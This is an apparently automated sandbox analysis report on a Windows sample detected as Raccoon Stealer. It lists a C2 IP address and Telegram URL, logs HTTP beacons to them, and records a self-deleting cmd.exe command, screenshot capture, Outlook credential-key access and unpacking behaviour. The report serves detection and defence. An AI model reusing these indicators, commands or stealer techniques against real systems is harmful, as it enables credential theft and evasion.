Source: nssckbi.dll.0.dr String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.quovadis.bm0
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: 31cGYywxgy.exe, 00000000.00000002.282856715.0000000002D2D000.00000004.00000001.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord
Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4842492154761;g
Source: 31cGYywxgy.exe, 00000000.00000002.282856715.0000000002D2D000.00000004.00000001.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779
Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C
Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: 31cGYywxgy.exe, 00000000.00000002.282842619.0000000002D20000.00000004.00000001.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: nssckbi.dll.0.dr String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: nssckbi.dll.0.dr String found in binary or memory: https://repository.luxtrust.lu0
Source: 31cGYywxgy.exe, 00000000.00000002.282856715.0000000002D2D000.00000004.00000001.sdmp String found in binary or memory: https://t..180.174.100/
Source: 31cGYywxgy.exe, 00000000.00000002.282842619.0000000002D20000.00000004.00000001.sdmp String found in binary or memory: https://t.me/agrybirdsgamerept
Source: 31cGYywxgy.exe, 00000000.00000002.282842619.0000000002D20000.00000004.00000001.sdmp String found in binary or memory: https://telegram.org/img/t_logo.png
Source: nssckbi.dll.0.dr String found in binary or memory: https://www.catcert.net/verarrel
Source: nssckbi.dll.0.dr String found in binary or memory: https://www.catcert.net/verarrel05
Source: qipcap.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: 31cGYywxgy.exe, 00000000.00000002.282856715.0000000002D2D000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: 31cGYywxgy.exe, 00000000.00000002.282856715.0000000002D2D000.00000004.00000001.sdmp String found in binary or memory: https://www.microsoft.c
Source: unknown HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 194.180.174.100
Source: unknown DNS traffic detected: queries for: t.me
Source: global traffic HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: t.me
Source: global traffic HTTP traffic detected: GET //l/f/G5GYJXwB3dP17Spz8m-L/d9a87544924531ef155dbccfe1a04e27038ca861 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.100
Source: global traffic HTTP traffic detected: GET //l/f/G5GYJXwB3dP17Spz8m-L/70e760d32c85dd68bb76b7cf4f9d65a400d87d16 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.100
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49742 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality to record screenshots
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0042C157 __EH_prolog,GdiplusStartup,GetDesktopWindow,GetWindowRect,GetWindowDC,GetDeviceCaps,CreateCompatibleDC,CreateDIBSection,DeleteDC,DeleteDC,DeleteDC,SaveDC,SelectObject,BitBlt,RestoreDC,DeleteDC,DeleteDC,DeleteDC,GdipAlloc,GdipCreateBitmapFromHBITMAP,_mbstowcs,GdipSaveImageToFile,DeleteObject,GdiplusShutdown, 0_2_0042C157

E-Banking Fraud:

barindex
Yara detected Raccoon Stealer
Source: Yara match File source: 0.2.31cGYywxgy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.31cGYywxgy.exe.2220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.31cGYywxgy.exe.2120e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.31cGYywxgy.exe.2220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.31cGYywxgy.exe.2120e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.31cGYywxgy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.257211865.0000000002220000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.282454454.0000000002120000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 31cGYywxgy.exe PID: 3104, type: MEMORYSTR

System Summary:

barindex
Uses 32bit PE files
Source: 31cGYywxgy.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Detected potential crypto function
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0043E2E4 0_2_0043E2E4
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0042A2F9 0_2_0042A2F9
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0043628C 0_2_0043628C
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0042C383 0_2_0042C383
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_004206DD 0_2_004206DD
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_004210B1 0_2_004210B1
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_004373C6 0_2_004373C6
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_00437819 0_2_00437819
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0041FD36 0_2_0041FD36
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0041E014 0_2_0041E014
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0042E110 0_2_0042E110
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0040E139 0_2_0040E139
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0044A480 0_2_0044A480
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0045A4BD 0_2_0045A4BD
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_004484BA 0_2_004484BA
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0045A5DD 0_2_0045A5DD
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_00410648 0_2_00410648
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0046475B 0_2_0046475B
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_004187EC 0_2_004187EC
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0041E857 0_2_0041E857
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: String function: 0044F0F9 appears 31 times
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: String function: 00467790 appears 65 times
PE file does not import any functions
Source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: 31cGYywxgy.exe, 00000000.00000002.282990135.000000006E822000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamemozglue.dll8 vs 31cGYywxgy.exe
Source: 31cGYywxgy.exe, 00000000.00000002.283168894.000000006E95B000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamenss3.dll8 vs 31cGYywxgy.exe
PE file contains strange resources
Source: 31cGYywxgy.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 31cGYywxgy.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 31cGYywxgy.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 31cGYywxgy.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\31cGYywxgy.exe Section loaded: sqlite3.dll Jump to behavior
Source: 31cGYywxgy.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 31cGYywxgy.exe ReversingLabs: Detection: 40%
Source: 31cGYywxgy.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\31cGYywxgy.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\31cGYywxgy.exe 'C:\Users\user\Desktop\31cGYywxgy.exe'
Source: C:\Users\user\Desktop\31cGYywxgy.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\31cGYywxgy.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
Source: C:\Users\user\Desktop\31cGYywxgy.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\31cGYywxgy.exe' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK Jump to behavior
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/62@1/2
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0042A224 CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree, 0_2_0042A224
Source: softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);<
Source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s;
Source: softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6540:120:WilError_01
Source: C:\Users\user\Desktop\31cGYywxgy.exe Mutant created: \Sessions\1\BaseNamedObjects\user5L1M3_noturbusiness
Source: C:\Users\user\Desktop\31cGYywxgy.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\31cGYywxgy.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\31cGYywxgy.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager Jump to behavior
Source: C:\Users\user\Desktop\31cGYywxgy.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: 31cGYywxgy.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.0.dr
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.0.dr
Source: Binary string: C:\xojine\siyi yovig6.pdb source: 31cGYywxgy.exe
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.0.dr
Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.0.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.0.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.0.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: 31cGYywxgy.exe, 00000000.00000002.282980746.000000006E819000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.0.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.0.dr
Source: Binary string: XC:\xojine\siyi yovig6.pdb source: 31cGYywxgy.exe
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy.dll.0.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.0.dr
Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.0.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.0.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.0.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: 31cGYywxgy.exe, 00000000.00000002.282980746.000000006E819000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.0.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.0.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.0.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.0.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.0.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.0.dr

Data Obfuscation:

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\31cGYywxgy.exe Unpacked PE file: 0.2.31cGYywxgy.exe.400000.0.unpack
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\31cGYywxgy.exe Unpacked PE file: 0.2.31cGYywxgy.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Uses code obfuscation techniques (call, push, ret)
